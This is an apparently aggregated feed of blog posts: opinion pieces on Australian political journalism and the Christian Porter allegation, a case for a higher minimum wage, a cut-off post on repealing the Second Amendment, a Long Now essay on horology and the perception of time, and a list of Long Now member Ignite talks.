He seems to be unaware that the best journalists are always oddballs. They do not follow the beaten path; for them output is more important than input. Patrick is clearly in the opposite camp. Seymour Hersh, Matt Taibbi and Glenn Greenwald come to mind.

In the end, the whole piece ended up being an exercise in character defamation and one of carrying water for Morrison. Patrick may get much more than a Christmas card from the Lodge this year, perhaps a turkey and a bottle of champers as well.

Journalists are supposed to hold power to account, not to bitch about their colleagues’ personal lives and try to tear them down. But many journalists, Patrick included, have long forgotten that they are the fourth estate and want to be players themselves.

There is an incestuous relationship between journalists who work in Canberra and politicians; I have mentioned it on more than one occasion. So what Patrick has done is not unique.

But in the process he has forgotten that the main job of a journalist is to either break, or else follow up, on news stories. These kinds of personal smears are one more reason why the public has been turned off mainstream media. He has truly plumbed the depths. You really can’t go lower than this.


Chaotic IdealismWhy we need a higher minimum wage

Imagine an auction where your work is up for sale; but many other people’s work is also up for sale, so that some lots will always remain unsold. There are more workers than jobs.

What is the best strategy for someone who wants a worker, any worker? It is to be the first to bid, bid the minimum, and then not raise anyone else’s bid. Raising is counterproductive because supply exceeds demand, and one can always wait until other buyers have hired their workers to bid the minimum on one of the lots left over. Because this is the ideal strategy, everyone will be using it. Every lot of work that can be bought, is bought, and for the minimum possible price.

For the worker, the only possible strategy is to accept any bid, because if they do not accept, they will be left till last and their work will be one of the unsold lots.

There is a way out for the worker, and that is to learn a skilled trade. However, this is a way out only for that worker. Other unskilled workers are still caught in the same system, and because there are still unskilled jobs and unskilled workers, the minimum-wage auction will go on as before.

Moreover, if too many workers learn skilled trades, employers in those trades will fulfill their quotas, leaving these overqualified workers to compete for unskilled jobs where their skills are irrelevant–back to the minimum-wage auction.

When the minimum wage is too low, the unskilled (or overqualified) worker naturally tries to fill their own needs, usually by taking more than one job, and by adding more family members–children and spouses–to the job market, to take jobs rather than being homemakers or students. This unbalances the system even further: There are yet more workers, and yet fewer jobs. The employer is able to bid even lower, and the worker must immediately accept any offer they can, for fear of not being employed at all.

When the employer hits the federal minimum wage, they cannot reduce the worker’s pay further; but they can still split jobs into part-time positions without benefits, hire people to work for tips, and hire “self-employed” “independent contractors” who can be paid less than minimum wage because they are technically not their employees. And this is what they do, because the market permits them to do it, because people still take those jobs, because those are the only ones they can get.

We have too many people in the work force and too few jobs for them to do. A low minimum wage forces more people to take more jobs, while simultaneously allowing employers to pay less.

If we raised the minimum wage, then there would be fewer workers, because a minimum wage job would once again be enough to support a family. Many jobs are being replaced with automation, but because of the higher minimum wage, those jobs would no longer be desperately fought over by unskilled workers.

As more jobs are replaced by automation, we may end up with the same scenario again: People fight over jobs, and employers find ways to pay less and less. At this point, we would need to institute a universal basic income, paid for by taxes on corporations. There’s simply no way around that–even though it might slow down when employers are forced to stop hiring so many part-timers and contractors, the number of jobs will eventually be much less than the number of people willing to work. At that point, those extra workers will be supported by universal basic income and, instead, do unpaid work like art, volunteer work, or study. The only alternative to this is a world in which a majority of unskilled workers are barely scraping by on half a job, crammed together in apartments that take five salaries to pay for, unable to afford health care, higher education, or anything but the next day’s low-quality food–and sometimes not even that.


Sam VarghesePeter van Onselen is no journalist. He is a political operative

Peter van Onselen is an academic from Western Australia who came to prominence in 2007 when he co-authored a biography of John Howard, the Liberal prime minister who reigned from 1996 to 2007.

Nearly 14 years later, Van Onselen has graduated to become a journalist who writes a weekly column for the right-wing broadsheet, The Australian, and also functions as the political editor for the tabloid free-to-air TV channel, 10.

Recently, however, Van Onselen has shown that he is no journalist, but rather a political operative who looks to back his powerful friends when they need his help. And nobody has needed his help more than the attorney-general, Christian Porter, a close mate of his and a source for many of his stories.

Porter was recently accused of raping a woman in 1988, when she was 16 and he was 17. The woman, known as Kate, died by her own hand last year, and did not make a police complaint, though she did toy with the idea. She is said to have been a highly intelligent person, but the alleged incident appears to have taken its toll, and she was described by many as having some mental problems.

Christian Porter (extreme left) and Peter van Onselen (third from right) in their younger days. Photo courtesy Kangaroo Court of Australia

Porter was not named in any stories initially, but held a press conference on 3 March and outed himself. He then took leave from his job and intends to come back at the end of the month.

A dossier of notes that Kate maintained was sent to a number of people and Van Onselen managed to obtain a copy. Using that he tried to paint Porter as innocent, both in written columns and also on the state-run TV broadcaster, where he appeared as a panellist on a program called Insiders.

He had a clear conflict of interest and should not have appeared on such a program. That’s what a journalist does. But then he does not appear to be a journalist at all.

Other right-wing journalists, like Chris Uhlmann of Nine Entertainment and Phillip Coorey of the Australian Financial Review, have also done their bit to defend Porter, but none as blatantly as Van Onselen, who also defended his friend on ABC Radio.

Porter has now filed defamation charges against the ABC for an article written by one of its journalists, Louise Milligan, based on that dossier. She did not contact Porter for comment, but then he was not named in the story. Many other journalists contacted Porter’s office and the offices of other ministers too, but did not get a reaction.

The ABC has to file its written defence by May 4 and Porter’s lawyers have to respond by May 11.

A preliminary court hearing is to be held on May 14, but it is unlikely that a trial will be held before 2021 ends.

The incestuous relationship between politicians and journalists is quite common in Canberra; here are two other instances: 1, 2.


Rondam RamblingsRepeal the Second Amendment

It has become repetitive to the point of being tiresome: a crazy person buys an automatic weapon and kills a bunch of innocent bystanders.  TV "news" reporters gather like vultures on a carcass.  Prayers are said.  Hands are wrung.  Soap boxes are scaled and calls for gun control are recited, which collide head-on with the second amendment and DC v. Heller.  And then, a few days later, everyone

LongNowIn Real Time

Horologist Brittany Nicole Cox giving a talk at The Interval at Long Now on horological heritage (02019). Photo by Anthony Thornton.

How do you measure a year? As straightforward as this seems, it is a truly personal question to each of us. What comes to mind? Life, weather or seismic events, loss or gains, political enterprises, a global pandemic? Or terms such as calendars, months, or dates? As a horologist, someone who studies time, I’ve realized there is no concrete way to answer that question. Yet, my job lies in the calculation, measurement, and the sure prediction of time passing in hours, minutes, and seconds. One might say I measure time through numbers, but often it is measured through the inevitable deterioration of the mechanisms I study that are responsible for calculating the passing of time. If anything, I have found that time is not measurable, but perceptible. It is the observation of change and loss that accounts for the passing of time.

Brittany Nicole Cox at her workbench. Photograph by Ben Lindbloom.

In my work I watch the brass and steel components of clock and watch mechanisms wear and break down, an indicator of how hard time has been on them. The tarnish of brass, the result of age and environmental factors. These mechanisms are continually renewed with the intention of the timepiece maintaining both its tangible and intangible qualities: its ability to calculate and record the passing of time, as well as fulfill its function as an artifact created by someone long ago with their own artistic vision and intentions for the observer. As time went on, these mechanisms were made with more wear resistant materials, always with the hope that they could outlast degradation, despite time. Perhaps one of the most successful at this was the 18th century clockmaker John Harrison, the man responsible for inventing the first marine chronometer. Some of his time pieces required no lubrication, as he invented rolling bearings for the application and relied on the synthesis between materials to maintain the time keeping qualities of the mechanism.¹ The clocks of John Harrison can still be seen keeping time at the Royal Observatory in Greenwich, London.

John Harrison’s H4, displayed at the Royal Observatory in Greenwich. Photograph by Mike Peel (CC BY-SA 4.0).

Keeping time is the work carried on by many before me and is one of the only things we still have in common with pre-Homo sapiens. We have measured time by seasons, famine, light, and darkness, our almanacs a result of such tidings.² These tomes published yearly include such things as tide tables, dates of eclipses and the movements of celestial bodies, and religious festivities. They recommend planting times for crops, give weather forecasts, and record the rising and setting of the sun and moon.³ Yet, none of these things truly indicate the inevitable passing of time. Only one thing changes on a molecular level from second to second. From the moment before and after a baby is born, or the instant when your loved one is still taking in breath to the moment when they are gone — the moment when you are present tense to the moment when you are past. A loss of heat is the only thing that indicates the passing of time.⁴ The more I have studied time, the more ethereal it becomes. Manifesting as water, in its different forms. Much like a snowflake melts, the longer you hold it or try to study it.⁵ Much like a snowflake, each person’s experience of time is different. It cannot be regulated. Time is a personal manifestation of our perception of the space we occupy, truly unique to each of us. It is a strange fact that our heads age faster than our feet. A shorter person is younger than you if you were born at the same instant in time.⁶ Even if time could be measured by some concrete means, our experience of time changes throughout our lives due to physical changes that occur in our brain.⁷ We cannot hold time, possess it, buy it, earn it, or commodify it. It may be the one thing we cannot commodify. Our experience of time changes, one day based on what we have gained and another through what we have lost, or more concisely put, what has changed.

Al-Jaziri’s candle clock (01305). Source: Freer Gallery of Art.

Perhaps one of the oldest methods of telling time through a loss or change principle are candle clocks. The earliest ones were often long thin candles with marked intervals to indicate the passing of hours as the candle burned down.⁸ Later variations included dials and even automata.⁹ The chemistry of a candle simply explained is as follows: you light a candle, the heat from the flame melts the wax, which becomes liquid. This liquid is then drawn up into the wick via capillary action. The heat from the flame vaporizes the liquid wax turning it to gas, which is then drawn into the flame creating heat and light. Enough heat is created to continue this cycle until the wax is exhausted.¹⁰

Chinese incense clock. Source: Science Museum Group(CC BY-NC-SA 4.0).

Incense clocks work in a similar fashion and at times were just as elaborate with bells and gongs, pulleys, and dials. The simplest form was that of an incense stick calibrated to burn at a known rate of combustion. Hours, minutes, and days were passed in witness of the incense stick.¹¹ Yet these forms of telling time through loss are based on confined, predictable, known systems. Our time is not. Our bodies are not like candles or incense sticks and yet we deteriorate with time, changed by factors such as our environment, toxins, or disease that can accelerate the deterioration of our bodies. Change is the body’s way of knowing time.

This may not leave one feeling very grounded in their experience of time, yet our individual perception is all that we have. Life by nature is fleeting. It does not outlast time. Our life is finite and time continues. It is one of the great condolences it can offer. When loss is too great to bear, remember the age-old adage, “everything passes with time.” There is wisdom with this idea carried across cultures. In the Cheyenne Native American tribe, there was a saying told to those ailing, going into battle, or suffering the losses that life brings,

My friends,

Only the stones

Stay on Earth forever

Use your best ability¹²

Though stones change, they do stay. They lose their original primeval form, eventually becoming something only recognizable through magnification. Their erosion is an indicator of time, much like seasons. The degradation of all materials, organic and inorganic, is irreversible and inevitable. To calculate the passing of time through the lens of water eroding stone is a manifestation of nature’s experience of time. Time is based here on the flow rate of the river. It is season based, environment based, climate based, degradation based and is impacted both negatively and positively through the cumulative actions of human beings.

Alaska River Time engages a network of glacial and spring rivers to regulate a new kind of clock, which speeds up and slows down with the waters. The clock can be used to recalibrate all aspects of life from work schedules to personal relationships. Source: Alaska River Time.

The Alaska River Time project of Jonathon Keats brings about an intentional unification between nature’s experience of time and our perception of its passing, while bringing to light our direct impact on it. We are both forced to bear witness and invited to engage. It is not unlike the time realized in our bodies, but here through known bodies of water.

I’d like to say that River Time can offer a more accurate time keeping system than the finest atomic clock, quartz watch, or mechanical time keeper, as it provides a true reflection of time through real time change. I realize that it is unpredictable and the flow rate of a river depends on many factors that the river is forced to exist within, that it cannot control, but can only experience. Perhaps it is this unpredictability which is its greatest asset.


[1] Jonathan Betts, John Harrison: inventor of the precision timekeeper.

[2] “The term almanac is of uncertain medieval Arabic origin; in modern Arabic, al-manākh is the word for climate,” From the Encyclopaedia Britannica.

[3] Encyclopaedia Britannica.

[4] Carlo Rovelli, The Order of Time.

[5] Carlo Rovelli, The Order of Time.

[6] Carlo Rovelli, The Order of Time.

[7] David Eagleman, Livewired: The Inside Story of the Ever-Changing Brain.

[8] H.H. Cunynghame, Time and Clocks: A Description of Ancient and Modern Methods of Measuring Time.

[9] Alfred Chapuis, Le Monde des Automates.

[10] Encyclopaedia Britannica.

[11] N.H.N Mody, Japanese Clocks.

[12] Paul Goble, The Boy and His Mud Horses: and Other Stories from the Tipi.


Alfred Chapuis and Eduouard Gelis, Le Monde des Automates: Etude Historique et Technique (Paris: 1928), Pages 51–68.

Britannica, T. Editors of Encyclopaedia. “Almanac.” Encyclopedia Britannica, January 25, 2018.

Britannica, T. Editors of Encyclopaedia. “Candle.” Encyclopedia Britannica, July 20, 2019.

Carlo Rovelli, The Order of Time (New York: Riverhead Books, 2018), Pages 3, 10, 25.

David Eagleman, Livewired: The Inside Story of the Ever-Changing Brain (New York: Pantheon, 2020).

H.H. Cunynghame, Time and Clocks: A Description of Ancient and Modern Methods of Measuring Time (Detroit: Single Tree Press, 1970), Page 46.

Jonathan Betts, John Harrison: inventor of the precision timekeeper. Endeavour Volume 17, Issue 4, 1993, Pages 160–167.

N.H.N Mody, Japanese Clocks (Japan: Charles E. Tuttle Company, Inc., 1977), Plate 114.

Paul Goble, The Boy and His Mud Horses: and Other Stories from the Tipi (China, World Wisdom, Inc., 2010).

Recommended Reading

  • Desert Solitaire by Edward Abbey
  • The Order of Time by Carlo Rovelli
  • The Sound of a Wild Snail Eating by Elisabeth Tova Bailey

Learn More

  • Watch Brittany Cox’s 02019 Interval talk, “Horological Heritage.”
  • Watch Jonathon Keats’s 02015 Interval talk, “Envisioning Deep Time.”
  • Pre-order Jonathon Keats’s forthcoming book, Thought Experiments: The Art of Jonathon Keats.

This essay was commissioned by the Anchorage Museum and was originally published on the Alaska River Time website.


LongNowLong Now Member Ignite Talks 02020

With thousands of members from all around the world, from artists and writers to engineers and farmers, the Long Now community has a wide range of perspectives, stories, and experience to offer.

On October 20, 02020, we heard 12 of them in a curated set of short Ignite talks given by Long Now Members. What’s an Ignite talk? It’s a story format created by Brady Forrest and Bre Pettis that’s exactly 5 minutes long, told by a speaker who’s working with 20 slides that auto-advance every 15 seconds (ready or not).

These 12 Ignite talks ranged from geeky, fanciful, poignant, educational, with some fresh angles on long-term thinking. We’re pleased to share them with you below.

Collaborating with Insects

Catherine Chalmers

Long Now Member Catherine Chalmers guides us through her multimedia “American Cockroach Project”—a 10-year investigation into humanity’s adversarial relationship with nature.

Activism as Futurism: Imagining Better Worlds

Allison Cooper

Long Now Member Allison Cooper encourages us to widen our windows on what is possible, plausible, probable, and preferable.

Change Agents (and How to Become One)

Danese Cooper

Long Now Member Danese Cooper shares a personal journey — of being changed by the world, and changing the world.

Instant stone (just add water!)

Jason Crawford

Long Now Member Jason Crawford shares the story of concrete, a sufficiently advanced technology indistinguishable from magic.

Plastic Mathematics in the Clock

Stewart Dickson

Long Now Member Stewart Dickson recounts the Equation of Time’s journey from mathematical equation, to 3D model, to machined-metal cam for the Clock of the Long Now.

Deep Fakes & The Archaic Revival

Michael Garfield

Long Now Member Michael Garfield tells a story about the end of reality. Not the end of the world, but the end of the idea of one consensus world.

The Great Dead End

Quentin Hardy

Long Now Member Quentin Hardy uses the historical example of Sienna, Italy to suggest that our present plague-year will have downstream cultural effects for generations.

The Future of Storytelling

Asmara Marek

Long Now Member Asmara Marek points at paths forward for the future of storytelling.

Our future drugs will come from the oceans; Can we save them in time?

Louis Metzger

Long Now Member Louis Metzger explains how our individual and collective well-being is intimately dependent on the preservation of ocean biodiversity.

Leways: The Story of a Chinatown Pool Hall

Marc Pomerleau

Long Now Member Marc Pomerleau gives us a glimpse of a Chinatown past, and a vision of its vitality rediscovered in a Chinatown future.

Art and Time

Madeline Sunley

Long Now Member Madeline Sunley shares her ideas & process for making oil paintings of marking systems for communication with the far future.

A Longer Now

Scott Thrift

Long Now Member Scott Thrift creates analog tools that tune our awareness to the perennial cycles of the day, the moon, and the year, so we can collectively rediscover the original nature of time–and a longer now.